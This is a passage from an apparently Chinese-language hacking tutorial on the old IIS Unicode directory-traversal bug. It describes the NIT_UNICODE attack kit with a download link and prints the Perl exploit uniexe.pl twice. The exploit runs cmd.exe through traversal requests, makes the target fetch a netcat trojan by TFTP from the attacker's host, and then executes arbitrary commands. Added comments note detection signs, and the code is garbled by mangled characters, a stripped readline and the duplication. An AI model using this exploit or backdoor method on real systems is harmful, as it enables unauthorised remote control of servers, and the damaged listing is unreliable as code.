exit;
}
}
3、攻击型NIT_UNICODE软件套装
下载地址http://packetstorm.securify.com/0011-exploits/NIT_UNICODE.zip
压缩包里含有以下文档：
uni.pl -------扫描UNICODE编码漏洞的主PERL程式
uniexe.pl -----执行TFTP过程的PERL程式
ncx99.exe -----一个把telnet端口配置在99的netcat木马
tftpd32.exe -----TFTP配置软件
tftpd32.hlp -----帮助文档
flie_id.diz
vendinfo.diz
readme.file -----使用说明和例子
　　该程式包主要利用unicode编码漏洞，把ncx99.exe上传到目标主机，并启动，使攻击者能够通过telnet 目标主机的99端口，登陆到目标主机上进行攻击行为。
　　以下程式在使用时需要修改一些东西，找到 $command="tftp -i .xxx.xxx.xxx GET ncx99.exe c:\\inetpub\\scripts\\nit.exe"; 这句，把xxx.xxx.xxx.xxx.xxx修改为您的IP地址，然后存盘。这句主要是把NCX99.EXE从您的主机改名传到目标主机c:\inetpub\scripts\去。另外还需要根据目标主机的NT版本，对程式里的..À¯..做相应的修改，比如说目标主机是WIN2K就修改为..Á..
#!/usr/bin/perl
# This is for educational purposes only!
# WHO LET THEM DOGS OUT!
# Use uni.pl first to see if this is a vulnerable server!
# Based on the script unicodeexecute.pl by Roelof Temmingh
# Files=uniexe.pl,uni.pl,readme.file,tftpd32.exe,exploit.readme
use Socket;
# uniexe.pl: one positional argument "host:port" names the IIS server. Every
# "£Ün" inside the string literals of this listing is a mangled "\n" (the
# backslash became a full-width character when the page was re-encoded), so
# as printed these are literal characters, not newlines.
if ($#ARGV<0) {die "Usage: uniexe.pl IP:port command£Ün";}
# @ARGV[0] is a one-element slice where $ARGV[0] is meant (works, but warns
# under -w). $host/$port/$target are package globals; sendraw() below reads
# $port and $target directly instead of receiving them as arguments.
($host,$port)=split(/:/,@ARGV[0]);
$target = inet_aton($host);
# Stage 1: probe. "dir" is run through the traversal and the listing is
# searched for nit.exe to see whether the payload is already in place.
$failed=1;
$command="dir";
# The two bytes rendered as "À¯" are raw 0xC0 0xAF, the overlong UTF-8 form of
# "/" that the (long since patched) IIS Unicode directory-traversal bug
# accepted — presumably "%c0%af" in the distributed script. The request path
# "/scripts/..À¯../winnt/system32/cmd.exe" is the pattern a defender looks for
# in IIS logs. The trailing "£Ücls" is not HTTP; it looks like a mangled
# "\cls" and its purpose cannot be told from this listing.
@results=sendraw("GET /scripts/..À¯../winnt/system32/cmd.exe?/c $command HTTP/1.0£Ür£Ün£Ür£Ün£Ücls");
foreach $line (@results){
if ($line =~ /nit.exe/) {$failed=0;}
}
# Stage 2: if the probe found no nit.exe, make the target fetch it. The
# server's own tftp client pulls ncx99.exe (per the article, a netcat listener
# on port 99) from the attacker's host into the web scripts directory under
# the name nit.exe. Detection: outbound TFTP (UDP/69) from a web server, and a
# new executable appearing under inetpub\scripts, are both strong indicators.
$failed2=1;
if ($failed==1) {
#You need to change the .xxx.xxx.xxx to your ip address. Duh!
$command="tftp -i .xxx.xxx.xxx GET ncx99.exe c:£Ü£Üinetpub£Ü£Üscripts£Ü£Ünit.exe";
# Replaces each space with the (mangled) sequence shown; presumably an
# escaping step for the URL query in the distributed script — cannot be
# confirmed from this listing.
$command=~s/ /£Ü /g;
@results2=sendraw("GET /scripts/..À¯../winnt/system32/cmd.exe?/c $command HTTP/1.0£Ür£Ün£Ür£Ün");
# $failed2 records whether nit.exe showed up in the reply; nothing afterwards
# acts on it, so a failed upload is never reported.
foreach $line2 (@results2){
if (($line2 =~ /nit.exe/ )) {$failed2=0;}
}
}
# Stage 3: the command given as the second argument is sent through the same
# traversal and whatever comes back is printed verbatim. Note that "my
# @results" here declares a new lexical that masks the package @results used
# above.
$command=@ARGV[1];
print "£Ün
Hit CTRL-C if this is Hanging";
$command=~s/ /£Ü /g;
my @results=sendraw("GET /scripts/..À¯../winnt/system32/cmd.exe?/c $command HTTP/1.0£Ür£Ün£Ür£Ün");
print @results;
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
# Send one raw request string to the host/port held in the package globals
# $port and $target (set by the caller; only the request text is passed in)
# and return every line read back until the peer closes. The bareword handle
# S and the hand-packed sockaddr are pre-IO::Socket idiom. "£Ün" in the die
# strings is a mangled "\n".
my ($pstr)=@_;
# getprotobyname('tcp')||2 falls back to protocol number 2 if the lookup
# fails; 2 is not TCP's number (6), so the fallback would not give a usable
# stream socket anyway.
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||2) ||
die("Socket problems£Ün");
# pack "SnA4x8": AF_INET (2) as a native short, port big-endian, the 4-byte
# address from inet_aton, 8 bytes of padding — a hand-built struct sockaddr_in.
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
# Make S the default output handle, unbuffer it, write the request.
select(S); $|=1; print $pstr;
# As printed the loop condition is empty, which Perl treats as true — the
# readline "<S>" was evidently lost when this page was extracted (angle
# brackets read as markup) — so the listing never leaves this loop.
while(){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...£Ün"); }
}
# NIT IN THE YEAR 2000
# Second, verbatim copy of the uniexe.pl body above (the article pasted the
# script twice; this copy lacks the shebang and "use Socket"). Read as one
# file it simply repeats the probe / tftp-upload / run-command sequence
# against the same $port/$target globals. "£Ün" in the strings is a mangled
# "\n"; "À¯" is the raw 0xC0 0xAF overlong "/" of the IIS Unicode traversal,
# and that request path is the log signature defenders watch for.
$failed=1;
$command="dir";
# Probe: run "dir" through the traversal and look for nit.exe in the output.
@results=sendraw("GET /scripts/..À¯../winnt/system32/cmd.exe?/c $command HTTP/1.0£Ür£Ün£Ür£Ün£Ücls");
foreach $line (@results){
if ($line =~ /nit.exe/) {$failed=0;}
}
$failed2=1;
# Upload branch: the target's own tftp client fetches the netcat payload into
# the web scripts directory as nit.exe. Outbound TFTP from a web server is the
# defender's tell here. $failed2 is set but never consulted afterwards.
if ($failed==1) {
#You need to change the .xxx.xxx.xxx to your ip address. Duh!
$command="tftp -i .xxx.xxx.xxx GET ncx99.exe c:£Ü£Üinetpub£Ü£Üscripts£Ü£Ünit.exe";
# Space replacement with the (mangled) sequence shown — presumably URL
# escaping in the distributed script; cannot be confirmed from this listing.
$command=~s/ /£Ü /g;
@results2=sendraw("GET /scripts/..À¯../winnt/system32/cmd.exe?/c $command HTTP/1.0£Ür£Ün£Ür£Ün");
foreach $line2 (@results2){
if (($line2 =~ /nit.exe/ )) {$failed2=0;}
}
}
# Run the user-supplied second argument through the traversal and print the
# raw reply. "my @results" here re-declares a lexical already declared by the
# earlier "my @results" in the first copy; -w reports this as masking an
# earlier declaration in the same scope.
$command=@ARGV[1];
print "£Ün
Hit CTRL-C if this is Hanging";
$command=~s/ /£Ü /g;
my @results=sendraw("GET /scripts/..À¯../winnt/system32/cmd.exe?/c $command HTTP/1.0£Ür£Ün£Ür£Ün");
print @results;
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
# Second definition of sendraw(), identical to the earlier one; in a single
# file Perl keeps this later body and -w reports "Subroutine sendraw
# redefined". Sends $pstr over a new TCP socket to the $port/$target package
# globals and is meant to return the reply lines. "£Ün" in the die strings is
# a mangled "\n".
my ($pstr)=@_;
# Falls back to protocol number 2 if the lookup fails (2 is not TCP's 6).
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||2) ||
die("Socket problems£Ün");
# Hand-packed sockaddr_in: AF_INET, big-endian port, 4-byte address, 8 pad
# bytes.
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
# S becomes the default output handle, unbuffered; the request is written.
select(S); $|=1; print $pstr;
# Empty loop condition as printed (Perl treats it as true); the "<S>" readline
# was apparently stripped as markup during extraction, so the listing as shown
# never terminates here.
while(){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...£Ün"); }
}
# NIT IN THE YEAR 2000
七．unicode编码漏洞提高篇
并不是说有UNICODE编码漏洞，以下的方法就能完全成功，主要给您一种思考的
方式，做到活学活用,举一反三,繁衍出更多更好的利用方法,提高对目标主机攻
击成功机率,使UNICODE编码漏洞的危害性让管理员们更加重视。
读懂MCD帮助里面的内容尤其是这方面的内容：
请注意，假如字符串有引号，能够接受用命令分隔符 '&&' 隔开
的多个命令。并且，由于兼容原因，/X 和 /E:ON 相同，/Y 和
/E:OFF 相同，并且 /R 和 /C 相同。忽略任何其他命令选项。
假如指定了 /C 或 /K，命令选项后的命令行其余部分将作为命令行处
理；在这种情况下，会使用下列逻辑处理引号字符("):
1. 假如符合下列任何条件，那么在命令行上的引号字符将被
保留:
- 不带 /S 命令选项
- 整整两个引号字符
- 在两个引号字符之间没有特别字符，特别字符为下列中的
一个: <>()@^|
- 在两个引号字符之间有至少一个空白字符
- 在两个引号字符之间有至少一个可执行文档的名称。
2. 否则，老办法是，看第一个字符是否是个引号字符，假如
是，舍去开头的字符并删除命令行上的最后一个引号字符，
保留最后一个引号字符之后的文字。
再熟悉一下利用ECHO写入法把一些特别字符写到文本文档的转换格式




